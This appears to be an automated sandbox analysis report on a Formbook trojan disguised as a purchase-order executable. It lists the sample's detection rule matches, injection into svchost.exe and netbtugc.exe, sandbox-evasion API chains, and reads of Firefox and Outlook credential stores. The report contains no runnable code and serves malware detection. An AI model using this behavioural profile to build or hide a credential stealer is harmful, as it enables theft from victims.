Source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/7

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001B37B5 GetLastError,FormatMessageW,

0_2_001B37B5

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001A10BF AdjustTokenPrivileges,CloseHandle,		0_2_001A10BF
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_001A16C3

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_001B51CD

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_001CA67C

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_001B648E

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001442A2

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

File created: C:\Users\user\AppData\Local\Temp\turbinate

Jump to behavior

Source: PO-DOC1522025-12.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000004.00000002.4617655793.000000000053F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2487878088.0000000000560000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.000000000056C000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.0000000000590000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.0000000000560000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO-DOC1522025-12.exe	Virustotal: Detection: 30%
Source: PO-DOC1522025-12.exe	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\PO-DOC1522025-12.exe "C:\Users\user\Desktop\PO-DOC1522025-12.exe"
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-DOC1522025-12.exe"
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-DOC1522025-12.exe"	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PO-DOC1522025-12.exe

Static file information: File size 1645568 > 1048576

Source: PO-DOC1522025-12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO-DOC1522025-12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO-DOC1522025-12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO-DOC1522025-12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO-DOC1522025-12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO-DOC1522025-12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PO-DOC1522025-12.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4618964468.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2376979999.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO-DOC1522025-12.exe, 00000000.00000003.2158675460.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, PO-DOC1522025-12.exe, 00000000.00000003.2148299636.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204520279.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2206583062.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2302825113.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000C3E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2300126241.0000000000740000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO-DOC1522025-12.exe, 00000000.00000003.2158675460.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, PO-DOC1522025-12.exe, 00000000.00000003.2148299636.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2300439322.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204520279.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2206583062.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4622084079.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2302825113.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000C3E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2300126241.0000000000740000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2269062053.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300088852.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000003.2239214406.0000000000D55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4623285061.000000000329C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2377197229.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2594702561.000000003778C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4623285061.000000000329C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2377197229.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2594702561.000000003778C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2269062053.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300088852.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000003.2239214406.0000000000D55000.00000004.00000020.00020000.00000000.sdmp

Source: PO-DOC1522025-12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO-DOC1522025-12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO-DOC1522025-12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO-DOC1522025-12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO-DOC1522025-12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001442DE

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00160A76 push ecx; ret	0_2_00160A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004048A9 push esp; ret	2_2_004048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E2BA push 00000038h; iretd	2_2_0041E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A436 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C92 pushad ; retf	2_2_00418C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A5D9 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004017E5 push ebp; retf 003Fh	2_2_004017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403780 push eax; ret	2_2_00403782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004147A2 push es; iretd	2_2_004147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340225F pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034027FA pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx	2_2_034309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340283D push eax; iretd	2_2_03402858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340135E push eax; iretd	2_2_03401369
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AA225F pushad ; ret	4_2_00AA27F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AA27FA pushad ; ret	4_2_00AA27F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AA283D push eax; iretd	4_2_00AA2858
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AD09AD push ecx; mov dword ptr [esp], ecx	4_2_00AD09B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AA1368 push eax; iretd	4_2_00AA1369
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001D2238 pushad ; iretd	4_2_001D2239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001DAB37 push 00000038h; iretd	4_2_001DAB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001D6CB3 push ebx; iretd	4_2_001D6E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001D6E56 push ebx; iretd	4_2_001D6E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001D0EAB push ebp; retf	4_2_001D0EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001D101F push es; iretd	4_2_001D1027
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001C1126 push esp; ret	4_2_001C1127
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001DD1B0 push es; ret	4_2_001DD1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001D550F pushad ; retf	4_2_001D5510
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001DFEF5 push FFFFFFBAh; ret	4_2_001DFEF7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001CFFA0 push esi; iretd	4_2_001CFFA5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0099429A push cs; retf	4_2_009942F6

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0015F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0015F98E
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_001D1C41

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-98475

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	API/Special instruction interceptor: Address: F4DB74
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 6816			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 3156			Jump to behavior

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4176	Thread sleep count: 6816 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4176	Thread sleep time: -13632000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4176	Thread sleep count: 3156 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4176	Thread sleep time: -6312000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe TID: 3380	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe TID: 3380	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe TID: 3380	Thread sleep time: -39000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0017C2A2 FindFirstFileExW,	0_2_0017C2A2
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B68EE FindFirstFileW,FindClose,	0_2_001B68EE
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_001B698F
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001AD076
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001AD3A9
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_001B9642
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_001B979D
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_001B9B2B
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_001ADBBE
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_001B5C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001DBAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_001DBAB0

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001442DE

Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: F56GKLK7U4.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: F56GKLK7U4.4.dr	Binary or memory string: discord.comVMware20,11696487552f
